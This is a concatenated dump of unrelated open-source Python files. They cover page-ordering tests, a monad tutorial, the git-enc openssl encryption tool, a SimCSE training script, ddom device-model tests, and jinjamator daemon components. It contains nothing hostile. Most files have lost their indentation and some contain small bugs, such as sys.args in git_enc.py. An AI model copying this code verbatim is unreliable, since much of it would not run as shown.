tot_pages, per_each_page = 5, 1
fp, sp = pages_in_order(tot_pages, per_each_page)
self.assertEqual(fp, [1,3,5])
self.assertEqual(sp, [4,2])
def test_pairing_1(self):
tot_pages, per_each_page = 5, 1
paired = _pairing(tot_pages, per_each_page)
self.assertEqual(paired, [[1], [2], [3], [4], [5]])
def test_pairing_2(self):
tot_pages, per_each_page = 5, 2
paired = _pairing(tot_pages, per_each_page)
self.assertEqual(paired, [[1,2], [3,4], [5]])
tot_pages, per_each_page = 6, 2
paired = _pairing(tot_pages, per_each_page)
self.assertEqual(paired, [[1,2], [3,4], [5,6]])
def test_pairing_3(self):
tot_pages, per_each_page = 5, 4
paired = _pairing(tot_pages, per_each_page)
self.assertEqual(paired, [[1,2,3,4], [5]])
tot_pages, per_each_page = 8, 4
paired = _pairing(tot_pages, per_each_page)
self.assertEqual(paired, [[1,2,3,4], [5,6,7,8]])
def test_taking_odd(self):
l = [[1],[2],[3],[4],[5]]
o = _taking_odd(l)
self.assertEqual(o, [[1],[3],[5]])
def test_taking_even(self):
l = [[1],[2],[3],[4],[5]]
o = _taking_even(l)
self.assertEqual(o, [[2],[4]])
def test_flattening(self):
l = [[1],[2],[3],[4],[5]]
o = _flattening(l)
self.assertEqual(o, [1,2,3,4,5])
if __name__=="__main__":
unittest.main()
```
#### File: toyPoC/monad/monad.py
```python
def step1(x):
return "Hello " + x
def step2(x):
return x + ", monads aren't that complicated."
def step3(x):
return "***" + x + "***"
def prep01():
def run():
x = "friend"
x = step1(x)
x = step2(x)
x = step3(x)
return x
print(run()) # ***Hello friend, monads aren't that complicated.***
def prep02():
def wrap(x):
return x
def wrap_call(x, func):
return func(x)
def run():
x = "friend"
x = wrap(x)
x = wrap_call(x, step1)
x = wrap_call(x, step2)
x = wrap_call(x, step3)
return x
print(run()) # ***Hello friend, monads aren't that complicated.***
def prep03():
def wrap(x):
return "[" + x + "]"
def wrap_call(x, func):
return "[" + func(x[1:-1]) + "]"
def run():
x = "friend"
x = wrap(x)
x = wrap_call(x, step1)
x = wrap_call(x, step2)
x = wrap_call(x, step3)
return x
print(run()) #[***Hello friend, monads aren't that complicated.***]
## wrap = ret
## wrap_call = bind
## ret(a : A) :: A -> B
## bind(b : B, f : A->A) :: B -> B
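## in prep03/monad01 below, A is a plain string and B is the same string wrapped in "[...]"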
def monad01():
def ret(x):
return "[" + x + "]"
def bind(x, func):
return "[" +func(x[1:-1]) + "]"
def run(ret, bind):
x = "friend"
x = ret(x)
x = bind(x, step1)
x = bind(x, step2)
x = bind(x, step3)
return x
print(run(ret, bind)) #[***Hello friend, monads aren't that complicated.***]
def monad02_practical():
def run(ret, bind):
x = "friend"
x = ret(x)
x = bind(x, step1)
x = bind(x, step2)
x = bind(x, step3)
return x
def ret(x):
print("Initial value:", x)
return "[" + x + "]"
def bind(x, func):
print("Input to next step is:", x)
result = func(x[1:-1])
print("Result is:", result)
return "[" + result + "]"
print(run(ret, bind))
# why practical
# 1. By adding a few simple lines to ret and bind, we can print out the value of x before and after each step.
# 2. Notice that without using a monad, we would have to write code for each step.
# 3. Since normally we only want to add print statements like this to our code temporarily, monads let us just swap the ret and bind functions around to change between production and debugging.
def monad03_withrealtype():
def ret(x):
return {"value": x, "count": 0}
def bind(x, func):
return {"value": func(x["value"]), "count": x["count"] + 1}
def run(ret, bind):
x = "friend"
x = ret(x)
x = bind(x, step1)
x = bind(x, step2)
x = bind(x, step3)
return x
print(run(ret, bind))
if __name__=='__main__':
prep01()
prep02()
prep03()
monad01()
monad02_practical()
monad03_withrealtype()
``` |
{
"source": "JiniousChoi/git-enc",
"score": 3
} |
#### File: JiniousChoi/git-enc/git_enc.py
```python
import yaml
import os, sys, argparse
from getpass import getpass
from subprocess import run
GITENCRYPT = ".gitencrypt"
GITENCPASSWORD = "<PASSWORD>"
def main():
args = parse_args()
if not args.cmd:
print("usage: {} -h".format(sys.args[0]))
return 1
    ydict = yaml.safe_load(open(GITENCRYPT))
if args.cmd == 'encrypt':
cmd_encrypt(ydict, args.password, args.paths)
elif args.cmd == 'decrypt':
cmd_decrypt(ydict, args.password, args.paths)
else:
assert("cannot reach here")
def parse_args():
usage = "usage: %prog [options] arg1 arg2"
parser = argparse.ArgumentParser(\
description='a utility tool for encrypting/decrypting confidential files.')
subparsers = parser.add_subparsers(title='available commands', dest='cmd')
add_encrypt_parser(subparsers)
add_decrypt_parser(subparsers)
# TODO
# addListParser(subparsers)
# addVerifyParser(subparsers)
return parser.parse_args()
def cmd_encrypt(ydict, password, paths):
password = get_password(password)
for path in paths:
for s,d in find_kvs_at(ydict, path):
run(['openssl', 'aes-256-cbc', '-k', password, '-in', s, '-out', d])
def cmd_decrypt(ydict, password, paths):
password = get_password(password)
for path in paths:
for s,d in find_kvs_at(ydict, path):
run(['openssl', 'aes-256-cbc', '-d', '-k', password, '-in', d, '-out', s])
def add_encrypt_parser(subparsers):
cmd = subparsers.add_parser('encrypt', help='encrypt files')
cmd.add_argument('-k', '--password', help='password for encrypt files')
cmd.add_argument('paths', nargs='*', help='a list of targeting groups to encrypt.')
def add_decrypt_parser(subparsers):
cmd = subparsers.add_parser('decrypt', help='decrypt files')
cmd.add_argument('-k', '--password', help='password for decrypt files')
cmd.add_argument('paths', nargs='*', help='a list of targeting groups to decrypt.')
def get_password(password):
if password:
return password
if GITENCPASSWORD in os.environ:
return os.environ[GITENCPASSWORD]
return getpass("type password: ")
def find_kvs_at(ydict, path):
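    # walk the dot-separated `path` into the nested dict, then yield every (source, destination) string pair beneath it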
def find_kvs(k, v):
if type(v) is str:
yield (k, v)
return
for k2, v2 in v.items():
yield from find_kvs(k2, v2)
sep = '.'
ks = path.split(sep)
it = ydict
for k in ks:
it = it[k]
return find_kvs(k, it)
if __name__ == "__main__":
main()
```
#### File: JiniousChoi/git-enc/test_git_enc.py
```python
import unittest
from git_enc import find_kvs_at
class GitencTest(unittest.TestCase):
def setUp(self):
self.d = {
'lv1-1': {
'lv2-1': {
'k1': 'v1',
'k2': 'v2'
},
'lv2-2': {
'k3': 'v3'
}
},
'lv1-2': {
'jin': 'choi'
}
}
def test_find_path_at(self):
actual = list(find_kvs_at(self.d, 'lv1-1'))
expected = [('k1','v1'), ('k2','v2'), ('k3','v3')]
self.assertEqual(actual, expected)
unittest.main()
``` |
{
"source": "JinJackson/Simcse-unsup",
"score": 2
} |
#### File: JinJackson/Simcse-unsup/train_unsup.py
```python
import argparse
import logging
import os
from pathlib import Path
from datasets import load_dataset
import torch
import torch.nn.functional as F
from torch.utils.data import DataLoader
from tqdm import tqdm
from transformers import BertTokenizer
from SimCSE import SimCSE
from CSECollator import CSECollator
# python train_unsup.py --train_file ./data/news_title.txt --pretrained ./model/bert-wwm/
def parse_args():
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("--train_file", type=str, help="train text file")
parser.add_argument("--pretrained", type=str, default="hfl/chinese-bert-wwm-ext", help="huggingface pretrained model")
parser.add_argument("--model_out", type=str, default="./model", help="model output path")
parser.add_argument("--num_proc", type=int, default=5, help="dataset process thread num")
parser.add_argument("--max_length", type=int, default=100, help="sentence max length")
parser.add_argument("--batch_size", type=int, default=64, help="batch size")
parser.add_argument("--epochs", type=int, default=2, help="epochs")
parser.add_argument("--lr", type=float, default=1e-5, help="learning rate")
parser.add_argument("--tao", type=float, default=0.05, help="temperature")
parser.add_argument("--device", type=str, default="cuda", help="device")
parser.add_argument("--display_interval", type=int, default=50, help="display interval")
parser.add_argument("--save_interval", type=int, default=100, help="save interval")
parser.add_argument("--pool_type", type=str, default="cls", help="pool_type")
parser.add_argument("--dropout_rate", type=float, default=0.3, help="dropout_rate")
args = parser.parse_args()
return args
def load_data(args, tokenizer):
data_files = {"train": args.train_file}
ds = load_dataset("text", data_files=data_files)
ds_tokenized = ds.map(lambda example: tokenizer(example["text"]), num_proc=args.num_proc)
collator = CSECollator(tokenizer, max_len=args.max_length)
dl = DataLoader(ds_tokenized["train"],
batch_size=args.batch_size,
collate_fn=collator.collate)
return dl
def compute_loss(y_pred, tao=0.05, device="cuda"):
idxs = torch.arange(0, y_pred.shape[0], device=device)
y_true = idxs + 1 - idxs % 2 * 2
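    # rows come in adjacent pairs (0,1), (2,3), ...: each even row is labeled with the
    # following odd row and each odd row with the preceding even row (its positive example)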
similarities = F.cosine_similarity(y_pred.unsqueeze(1), y_pred.unsqueeze(0), dim=2)
similarities = similarities - torch.eye(y_pred.shape[0], device=device) * 1e12
similarities = similarities / tao
loss = F.cross_entropy(similarities, y_true)
return torch.mean(loss)
def train(args):
tokenizer = BertTokenizer.from_pretrained(args.pretrained, mirror="tuna")
dl = load_data(args, tokenizer)
model = SimCSE(args.pretrained, args.pool_type, args.dropout_rate).to(args.device)
optimizer = torch.optim.AdamW(model.parameters(), lr=args.lr)
model_out = Path(args.model_out)
if not model_out.exists():
os.mkdir(model_out)
model.train()
batch_idx = 0
for epoch_idx in range(args.epochs):
for data in tqdm(dl):
batch_idx += 1
pred = model(input_ids=data["input_ids"].to(args.device),
attention_mask=data["attention_mask"].to(args.device),
token_type_ids=data["token_type_ids"].to(args.device))
loss = compute_loss(pred, args.tao, args.device)
optimizer.zero_grad()
loss.backward()
optimizer.step()
loss = loss.item()
if batch_idx % args.display_interval == 0:
logging.info(f"batch_idx: {batch_idx}, loss: {loss:>10f}")
if batch_idx % args.save_interval == 0:
torch.save(model.state_dict(), model_out / "epoch_{0}-batch_{1}-loss_{2:.6f}".format(epoch_idx, batch_idx, loss))
def main():
args = parse_args()
train(args)
if __name__ == "__main__":
log_fmt = "%(asctime)s|%(name)s|%(levelname)s|%(message)s"
logging.basicConfig(level=logging.INFO, format=log_fmt)
main()
``` |
{
"source": "jinjamator/ddom",
"score": 2
} |
#### File: ddom/tests/test_dom.py
```python
from ddom import *
import unittest
import logging
# logging.basicConfig(level=logging.DEBUG)
class TestObjectModel(unittest.TestCase):
def test_n5k_c5672up_chassis(self):
chassis = Chassis("n5k-c5672up", "cisco")
self.assertIsInstance(chassis, Chassis)
self.assertEqual(chassis.type, "chassis")
slot1_ports = chassis.find_children("port", {"parent.number": "1"})
self.assertEqual(len(slot1_ports), 49)
for idx, port in enumerate(slot1_ports):
if port.name.startswith("eth"):
self.assertEqual(port.name, f"eth1/{idx+1}")
self.assertEqual(port.pid, f"unified_sfp_plus")
if port.name.startswith("mgmt"):
self.assertEqual(port.name, f"mgmt0")
self.assertEqual(port.pid, f"1000-base-t")
slot2_ports = chassis.find_children("port", {"parent.number": "2"})
self.assertEqual(len(slot2_ports), 6)
for idx, port in enumerate(slot2_ports):
self.assertEqual(port.name, f"eth2/{idx+1}")
self.assertEqual(port.pid, f"qsfp")
def test_airflow(self):
chassis = Chassis("n5k-c5672up", "cisco")
psu_1 = PowerSupply("nxa-pac-1100w", "cisco")
psu_2 = PowerSupply("nxa-pac-1100w-b", "cisco")
fan_1 = Fan("n6k-c6001-fan-b", "cisco")
fan_2 = Fan("n6k-c6001-fan-f", "cisco")
fan_3 = Fan("n6k-c6001-fan-f", "cisco")
chassis.slot("PSU-1").connect(psu_1)
with self.assertRaises(InvalidAirFlowError):
chassis.slot("FAN-1").connect(fan_1)
chassis.slot("PSU-2").connect(psu_2)
chassis.slot("FAN-2").connect(fan_2)
chassis.slot("FAN-3").connect(fan_3)
def test_dom_access_by_name(self):
chassis = Chassis("n5k-c5672up", "cisco")
self.assertEqual(chassis.slot("SLOT-1").supervisor().port(1).name, "eth1/1")
self.assertEqual(
chassis.slot("SLOT-1").supervisor().port("eth1/48").name, "eth1/48"
)
with self.assertRaises(ChildNotFoundError):
chassis.slot("SLOT-2").linecard().port("eth1/10").name
def test_dom_access_by_index(self):
chassis = Chassis("n5k-c5672up", "cisco")
self.assertEqual(
chassis.slot_index(0).supervisor().port_index(0).name, "eth1/1"
)
self.assertEqual(
chassis.slot_index(0).supervisor().port_index(47).name, "eth1/48"
)
def test_dom_access_by_number(self):
chassis = Chassis("n5k-c5672up", "cisco")
self.assertEqual(chassis.slot(1).supervisor().port(1).name, "eth1/1")
self.assertEqual(chassis.slot(1).supervisor().port(48).name, "eth1/48")
def test_rj45_cable(self):
chassis = Chassis("n5k-c5672up", "cisco")
chassis2 = Chassis("n5k-c5672up", "cisco")
mgmt0 = chassis.find_children("port", {"name": "mgmt0"})[0].transceiver()
mgmt1 = chassis2.find_children("port", {"name": "mgmt0"})[0].transceiver()
cable = Cable("rj45-cat5e-rj45")
mgmt0.connect(cable)
mgmt1.connect(cable)
# print(chassis)
def test_to_yaml(self):
chassis = Chassis("n5k-c5672up", "cisco")
psu_1 = PowerSupply("nxa-pac-1100w", "cisco")
psu_2 = PowerSupply("nxa-pac-1100w", "cisco")
fan_1 = Fan("n6k-c6001-fan-f", "cisco")
fan_2 = Fan("n6k-c6001-fan-f", "cisco")
fan_3 = Fan("n6k-c6001-fan-f", "cisco")
chassis.slot("PSU-1").connect(psu_1)
chassis.slot("PSU-2").connect(psu_2)
chassis.slot("FAN-1").connect(fan_1)
chassis.slot("FAN-2").connect(fan_2)
chassis.slot("FAN-3").connect(fan_3)
yaml_string = chassis.to_yaml()
with open("create.yaml", "w") as fh:
fh.write(yaml_string)
chassis_restore = Chassis("n5k-c5672up", "cisco", yaml.safe_load(yaml_string))
yaml_restore_string = chassis_restore.to_yaml()
with open("restore.yaml", "w") as fh:
fh.write(yaml_restore_string)
self.assertEqual(
len(chassis_restore.find_children("slot", {"name": "FAN-1"})), 1
)
self.assertEqual(yaml_string, yaml_restore_string)
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "jinjamator/jinjamator-core",
"score": 2
} |
#### File: daemon/api/restx.py
```python
import logging
import traceback
from flask_restx import Api
from flask import url_for
# from rest_api_demo import settings
from sqlalchemy.orm.exc import NoResultFound
log = logging.getLogger(__name__)
class Custom_API(Api):
@property
def specs_url(self):
"""
The Swagger specifications absolute url (ie. `swagger.json`)
:rtype: str
"""
return url_for(self.endpoint("specs"), _external=False)
api = Custom_API(
version="1.0", title="Jinjamator API", description="The REST API of Jinjamator"
)
@api.errorhandler
def default_error_handler(e):
message = "An unhandled exception occurred."
log.exception(message)
# if not settings.FLASK_DEBUG:
return {"message": message}, 500
@api.errorhandler(NoResultFound)
def database_not_found_error_handler(e):
log.warning(traceback.format_exc())
return {"message": "A database result was required but none was found."}, 404
```
#### File: backends/database/models.py
```python
from __future__ import absolute_import, unicode_literals
from datetime import datetime
import sqlalchemy as sa
from sqlalchemy.types import PickleType
from celery import states
from celery.five import python_2_unicode_compatible
from .session import ResultModelBase
__all__ = ("Task", "TaskSet", "JobLog")
@python_2_unicode_compatible
class Task(ResultModelBase):
"""Task result/status."""
__tablename__ = "celery_taskmeta"
__table_args__ = {"sqlite_autoincrement": True}
id = sa.Column(
sa.Integer,
sa.Sequence("task_id_sequence"),
primary_key=True,
autoincrement=True,
)
task_id = sa.Column(sa.String(155), unique=True, index=True)
status = sa.Column(sa.String(50), default=states.PENDING)
result = sa.Column(PickleType, nullable=True)
date_done = sa.Column(
sa.DateTime, default=datetime.utcnow, onupdate=datetime.utcnow, nullable=True
)
date_scheduled = sa.Column(sa.DateTime, default=datetime.utcnow, nullable=True)
date_start = sa.Column(sa.DateTime, default=datetime.utcnow, nullable=True)
traceback = sa.Column(sa.Text, nullable=True)
jinjamator_task = sa.Column(sa.String(1024), nullable=False, default="")
created_by_user_id = sa.Column(sa.Integer, nullable=False)
def __init__(self, task_id):
self.task_id = task_id
def to_dict(self):
return {
"task_id": self.task_id,
"status": self.status,
"result": self.result,
"traceback": self.traceback,
"date_done": self.date_done,
"date_start": self.date_start,
"date_scheduled": self.date_scheduled,
"jinjamator_task": self.jinjamator_task,
"created_by_user_id": self.created_by_user_id,
}
def __repr__(self):
return "<Task {0.task_id} for {0.jinjamator_task} state: {0.status}>".format(
self
)
@python_2_unicode_compatible
class TaskSet(ResultModelBase):
"""TaskSet result."""
__tablename__ = "celery_tasksetmeta"
__table_args__ = {"sqlite_autoincrement": True}
id = sa.Column(
sa.Integer,
sa.Sequence("taskset_id_sequence"),
autoincrement=True,
primary_key=True,
)
taskset_id = sa.Column(sa.String(155), unique=True)
task_id = sa.Column(sa.String(155))
result = sa.Column(PickleType, nullable=True)
date_done = sa.Column(sa.DateTime, default=datetime.utcnow, nullable=True)
def __init__(self, taskset_id, result):
self.taskset_id = taskset_id
self.result = result
def to_dict(self):
return {
"taskset_id": self.taskset_id,
"result": self.result,
"date_done": self.date_done,
}
def __repr__(self):
return "<TaskSet: {0.taskset_id}>".format(self)
@python_2_unicode_compatible
class JobLog(ResultModelBase):
"""JobLog result."""
__tablename__ = "logs"
__table_args__ = {"sqlite_autoincrement": True}
id = sa.Column(
sa.Integer,
sa.Sequence("logs_id_sequence"),
autoincrement=True,
primary_key=True,
)
task_id = sa.Column(sa.String(155), nullable=False, index=True)
timestamp = sa.Column(sa.DateTime, nullable=False)
message = sa.Column(sa.UnicodeText(), nullable=False, default="")
configuration = sa.Column(sa.UnicodeText(), nullable=False, default="")
parent_tasklet = sa.Column(sa.UnicodeText(), nullable=False, default="")
parent_task_id = sa.Column(sa.UnicodeText(), nullable=False, default="")
current_task = sa.Column(sa.UnicodeText(), nullable=False, default="")
current_tasklet = sa.Column(sa.UnicodeText(), nullable=False, default="")
current_task_id = sa.Column(sa.String(255), nullable=False, default="")
level = sa.Column(sa.String(64), nullable=False, default="")
stdout = sa.Column(sa.UnicodeText(), nullable=False, default="")
exc_info = sa.Column(sa.UnicodeText(), nullable=False, default="")
created_by_user_id = sa.Column(sa.Integer, nullable=False)
def __repr__(self):
return "<job {0}>".format(self.id)
```
#### File: genson/schema/node.py
```python
from .generators import GENERATORS, Typeless
class SchemaGenerationError(RuntimeError):
pass
class SchemaNode(object):
"""
Basic schema generator class. SchemaNode objects can be loaded
up with existing schemas and objects before being serialized.
"""
generator_classes = GENERATORS
def __init__(self):
self._schema_generators = []
def add_schema(self, schema):
"""
Merges in an existing schema.
arguments:
* `schema` (required - `dict` or `SchemaNode`):
an existing JSON Schema to merge.
"""
# serialize instances of SchemaNode before parsing
if isinstance(schema, SchemaNode):
schema = schema.to_schema()
for subschema in self._get_subschemas(schema):
# delegate to SchemaType object
schema_generator = self._get_generator_for_schema(subschema)
schema_generator.add_schema(subschema)
# return self for easy method chaining
return self
def add_object(self, obj):
"""
Modify the schema to accommodate an object.
arguments:
* `obj` (required - `dict`):
a JSON object to use in generating the schema.
"""
# delegate to SchemaType object
schema_generator = self._get_generator_for_object(obj)
schema_generator.add_object(obj)
# return self for easy method chaining
return self
def to_schema(self):
"""
Convert the current schema to a `dict`.
"""
types = set()
generated_schemas = []
for schema_generator in self._schema_generators:
generated_schema = schema_generator.to_schema()
if len(generated_schema) == 1 and "type" in generated_schema:
types.add(generated_schema["type"])
else:
generated_schemas.append(generated_schema)
if types:
if len(types) == 1:
(types,) = types
else:
types = sorted(types)
generated_schemas = [{"type": types}] + generated_schemas
if len(generated_schemas) == 1:
(result_schema,) = generated_schemas
elif generated_schemas:
result_schema = {"anyOf": generated_schemas}
else:
result_schema = {}
return result_schema
def __len__(self):
return len(self._schema_generators)
def __eq__(self, other):
# TODO: find a more optimal way to do this
if self is other:
return True
if not isinstance(other, type(self)):
return False
return self.to_schema() == other.to_schema()
def __ne__(self, other):
return not self.__eq__(other)
# private methods
def _get_subschemas(self, schema):
if "anyOf" in schema:
return [
subschema
for anyof in schema["anyOf"]
for subschema in self._get_subschemas(anyof)
]
elif isinstance(schema.get("type"), list):
other_keys = dict(schema)
del other_keys["type"]
return [dict(type=tipe, **other_keys) for tipe in schema["type"]]
else:
return [schema]
def _get_generator_for_schema(self, schema):
return self._get_generator_for_("schema", schema)
def _get_generator_for_object(self, obj):
return self._get_generator_for_("object", obj)
def _get_generator_for_(self, kind, schema_or_obj):
# check existing types
for schema_generator in self._schema_generators:
if getattr(schema_generator, "match_" + kind)(schema_or_obj):
return schema_generator
# check all potential types
for schema_generator_class in self.generator_classes:
if getattr(schema_generator_class, "match_" + kind)(schema_or_obj):
schema_generator = schema_generator_class(type(self))
# incorporate typeless generator if it exists
if self._schema_generators and isinstance(
self._schema_generators[-1], Typeless
):
typeless = self._schema_generators.pop()
schema_generator.add_schema(typeless.to_schema())
self._schema_generators.append(schema_generator)
return schema_generator
# no match found, if typeless add to first generator
if kind == "schema" and Typeless.match_schema(schema_or_obj):
if not self._schema_generators:
self._schema_generators.append(Typeless(type(self)))
schema_generator = self._schema_generators[0]
return schema_generator
# no match found, raise an error
raise SchemaGenerationError(
"Could not find matching type for {0}: {1!r}".format(kind, schema_or_obj)
)
```
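A minimal usage sketch of the `SchemaNode` class above, assuming the module is importable as `genson.schema.node` (matching the file path shown): a node merges sample objects and existing schemas, then serializes the combined result with `to_schema()`.
```python
from genson.schema.node import SchemaNode

node = SchemaNode()
# infer a schema fragment from a sample object
node.add_object({"name": "alice", "age": 30})
# merge in an already existing schema
node.add_schema({"type": "object", "properties": {"name": {"type": "string"}}})
# serialize the merged result as a plain dict
print(node.to_schema())
```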
#### File: task/celery/__init__.py
```python
from celery import Celery
from jinjamator.task import JinjamatorTask
import importlib
import sys
import os
from time import sleep
import collections
import logging
import json
from celery.exceptions import Ignore
from jinjamator.daemon import celery
from jinjamator.task.celery.loghandler import CeleryLogHandler, CeleryLogFormatter
from jinjamator.task import TaskletFailed
from copy import deepcopy
@celery.task(bind=True)
def run_jinjamator_task(self, path, data, output_plugin, user_id):
"""
Jinjamator Celery Task runner.
"""
self.update_state(
state="PROGRESS",
meta={
"status": "setting up jinjamator task run",
"configuration": {"root_task_path": path, "created_by_user_id": user_id},
},
)
formatter = CeleryLogFormatter()
log_handler = CeleryLogHandler()
formatter.created_by_user_id = user_id
log_handler.created_by_user_id = user_id
log_handler.setLevel(logging.DEBUG)
log_handler.setFormatter(formatter)
log_handler.set_celery_task(self)
log_handler.formatter.set_root_task_path(path)
# if "jinjamator_pre_run_tasks" in data:
# for pre_run_task in data["jinjamator_pre_run_tasks"]:
# task = JinjamatorTask()
# task._configuration._data["jinjamator_job_id"] = self.request.id
# log_handler.formatter.set_jinjamator_task(task)
# task._scheduler = self
# task._log.addHandler(log_handler)
# task._log.setLevel(logging.DEBUG)
# if "output_plugin" in pre_run_task["task"]:
# task.load_output_plugin(pre_run_task["task"]["output_plugin"])
# else:
# task.load_output_plugin("console")
# task.configuration.merge_dict(pre_run_task["task"]["data"])
# task._configuration.merge_dict(
# celery.conf["jinjamator_private_configuration"]
# )
# task.configuration.merge_dict(deepcopy(data))
# task.load(pre_run_task["task"]["path"])
# task._log.info(
# "running pre run task {}".format(pre_run_task["task"]["path"])
# )
# if not task.run():
# raise Exception("task failed")
# task._log.handlers.remove(log_handler)
# log_handler._task = None
# del task
self.update_state(
state="PROGRESS",
meta={
"status": "running main task",
"configuration": {"root_task_path": path, "created_by_user_id": user_id},
},
)
task = JinjamatorTask()
task._configuration._data["jinjamator_job_id"] = self.request.id
task._scheduler = self
log_handler.formatter.set_jinjamator_task(task)
task._log.setLevel(logging.DEBUG)
task._log.addHandler(log_handler)
task.load_output_plugin(
output_plugin,
celery.conf["jinjamator_private_configuration"][
"global_output_plugins_base_dirs"
],
)
task._configuration.merge_dict(celery.conf["jinjamator_private_configuration"])
task.configuration.merge_dict(data)
task.load(path)
try:
task.run()
except TaskletFailed:
raise Exception("task failed")
return {
"status": "finished task",
"stdout": task._stdout.getvalue(),
"log": log_handler.contents,
}
```
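The Celery task above is normally enqueued asynchronously by the daemon; below is a hedged sketch of how a caller might dispatch it and poll its state. The path, data and user id values are assumptions for illustration, not taken from this file.
```python
from jinjamator.task.celery import run_jinjamator_task

# enqueue the task on a worker; argument values are illustrative
async_result = run_jinjamator_task.delay(
    "/tasks/example_task", {"some_var": "value"}, "console", 1
)
print(async_result.state)  # PENDING / PROGRESS / SUCCESS / FAILURE
print(async_result.info)   # meta dict set via update_state, or the return value on success
```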
#### File: jinjamator/tools/password.py
```python
redacted_passwords = []
def redact(obj, is_password=False):
if isinstance(obj, str):
if is_password:
if obj not in redacted_passwords:
redacted_passwords.append(obj)
obj = "__redacted__"
return redacted_passwords, obj
elif isinstance(obj, list):
for index, item in enumerate(obj):
obj[index] = redact(item)[1]
return redacted_passwords, obj
elif isinstance(obj, dict):
for k, v in obj.items():
if (
("pass" in k and isinstance(v, str))
or (k.endswith("_key") and isinstance(v, str))
or ("secret" in k and isinstance(v, str))
):
obj[k] = redact(v, True)[1]
else:
obj[k] = redact(v)[1]
return redacted_passwords, obj
return redacted_passwords, obj
```
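A short sketch of how `redact()` behaves on a nested configuration dict; the import path is assumed from the file location `jinjamator/tools/password.py`.
```python
from jinjamator.tools.password import redact

cfg = {"username": "admin", "password": "s3cret", "nested": {"api_key": "abc"}}
passwords, cleaned = redact(cfg)
# cleaned   -> {'username': 'admin', 'password': '__redacted__', 'nested': {'api_key': '__redacted__'}}
# passwords -> ['s3cret', 'abc']  (collected so they can be masked elsewhere, e.g. in log output)
```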
#### File: tools/rest_clients/jinjamator.py
```python
from jinjamator.external.rest_client.api import API
import logging
from pprint import pformat
from jinjamator.external.rest_client.resource import Resource
from jinjamator.external.rest_client.request import make_request
from jinjamator.external.rest_client.models import Request
from types import MethodType
class JinjamatorResource(Resource):
def add_action(self, action_name):
def action_method(
self,
*args,
body=None,
params=None,
headers=None,
action_name=action_name,
**kwargs,
):
url = self.get_action_full_url(action_name, *args)
method = self.get_action_method(action_name)
request = Request(
url=url,
method=method,
params=params or {},
body=body,
headers=headers or {},
timeout=self.timeout,
ssl_verify=self.ssl_verify,
kwargs=kwargs,
)
request.params.update(self.params)
request.headers.update(self.headers)
response = make_request(self.client, request)
if response.headers.get("Authorization"):
self.headers["Authorization"] = response.headers["Authorization"]
return response
setattr(self, action_name, MethodType(action_method, self))
class JinjamatorClient(object):
def __init__(self, url, **kwargs):
self._log = logging.getLogger()
self._base_url = url
self._username = kwargs.get("username", None)
self._password = kwargs.get("password", None)
self.api = API(
api_root_url=url, # base api url
params={}, # default params
headers={}, # default headers
timeout=10, # default timeout in seconds
append_slash=False, # append slash to final url
json_encode_body=True, # encode body as json
ssl_verify=kwargs.get("ssl_verify", None),
resource_class=JinjamatorResource,
)
def __str__(self):
return pformat(self.api.get_resource_list())
def login(self, username=None, password=<PASSWORD>):
if username:
self._username = username
if password:
self._password = password
auth_data = self.api.aaa.login.local.list(
params={"username": self._username, "password": self._password}
).body
token = auth_data.get("access_token")
self.api.headers["Authorization"] = token
return True
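# Usage sketch (illustrative URL and credentials, shown only to demonstrate the
# client/resource pattern implemented above):
#
#   client = JinjamatorClient("http://localhost:5000/api", username="admin", password="secret")
#   client.login()   # fetches a token and stores it in the Authorization header
#   print(client)    # pformat of the resource list discovered from the API root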
``` |
{
"source": "jinjamator/jinjamator-daemon-webui",
"score": 2
} |
#### File: jinjamator/jinjamator-daemon-webui/setup.py
```python
import setuptools
import os
from subprocess import check_output
command = "git describe --tags --dirty"
version_format = ("{tag}.dev{commitcount}+{gitsha}",)
def format_version(version, fmt):
parts = version.split("-")
assert len(parts) in (3, 4)
dirty = len(parts) == 4
tag, count, sha = parts[:3]
if count == "0" and not dirty:
return tag
return fmt.format(tag=tag, commitcount=count, gitsha=sha.lstrip("g"))
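# Worked example (illustrative): format_version("1.2.3-5-gabc1234", version_format)
# splits into tag="1.2.3", count="5", sha="gabc1234" and returns "1.2.3.dev5+abc1234";
# an input of "1.2.3-0-gabc1234" (a clean checkout of the tag) returns just "1.2.3".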
version = format_version(check_output(command.split()).decode("utf-8").strip(), version_format)
with open("README.rst", "r") as fh:
long_description = fh.read()
with open("requirements.txt", "r") as fh:
install_requires = fh.read().split("\n")
setuptools.setup(
name="jinjamator-daemon-webui",
version=version,
author="<NAME>",
author_email="<EMAIL>",
description="WebUI for jinjamator in daemon mode",
long_description=long_description,
long_description_content_type="text/x-rst",
url="https://github.com/jinjamator/jinjamator-daemon-webui",
include_package_data=True,
packages=["jinjamator.daemon.webui"],
install_requires=install_requires,
license="ASL V2",
classifiers=[
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 3.8",
"Topic :: System :: Installation/Setup",
"Topic :: System :: Systems Administration",
"Topic :: Utilities",
],
python_requires=">=3.8",
zip_safe=False,
)
``` |
{
"source": "jinjamator/jinjamator",
"score": 2
} |
#### File: wsa/logs/aclog.py
```python
from textfsm import TextFSM
import os
from jinjamator.plugins.content import file
from jinjamator import plugin_loader
from io import StringIO
def parse(path):
plugin_loader.content.py_load_plugins(globals())
from os.path import dirname
raw_data = file.load(path)
base_path = dirname(__file__)
fields = None
for line in raw_data.split("\n"):
if line.startswith("#Fields"):
fields = line.replace("#Fields: ", "")
break
if not fields:
raise ValueError(f"Cannot find field description in file {path}")
fsm_mappings = []
for field, mapping in yaml.loads(file.load(f"{base_path}/fsm/aclog.mapping.yaml"))[
"fields"
].items():
if isinstance(mapping["name"], str):
name = str(mapping["name"])
fields = fields.replace("%" + field, "${" + name + "}")
if (f"Value Required {name} {mapping['regex']}") not in fsm_mappings:
fsm_mappings.append(f"Value Required {name} {mapping['regex']}")
elif isinstance(mapping["name"], list):
replacement = ""
for index, name in enumerate(mapping["name"]):
if name:
replacement += "${" + str(name) + "}"
if (
f"Value Required {name} {mapping['regex'][index]}"
) not in fsm_mappings:
fsm_mappings.append(
f"Value Required {name} {mapping['regex'][index]}"
)
else:
replacement += str(mapping["regex"][index])
fields = fields.replace("%" + field, replacement)
if "%" in fields:
raise NotImplementedError(f"Missing mapping for field. {fields}")
dynamic_fsm_template = task.run(
dirname(__file__) + "/fsm/aclog.textfsm.j2",
{"MAPPINGS": "\n".join(fsm_mappings), "LINE_SPEC": fields},
output_plugin="null",
)[0]["result"]
log.debug(dynamic_fsm_template)
